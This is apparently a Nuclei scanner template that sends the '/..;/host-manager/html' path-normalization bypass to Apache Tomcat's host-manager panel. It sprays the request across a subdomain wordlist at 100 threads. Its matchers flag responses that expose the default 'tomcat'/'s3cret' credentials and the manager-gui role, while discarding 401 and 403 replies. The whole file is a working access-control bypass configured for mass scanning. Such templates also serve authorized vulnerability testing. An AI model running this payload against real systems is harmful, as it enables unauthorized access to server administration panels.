id: tomcat-manager-pathnormalization 2

info:
  name: Tomcat Manager Path Normalization
  author: organiccrap
  severity: info
  reference: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /..;/host-manager/html HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'username="tomcat" password="s3cret"'
          - 'manager-gui'
        condition: and

      - type: status
        status:
          - 403
          - 401
        negative: true
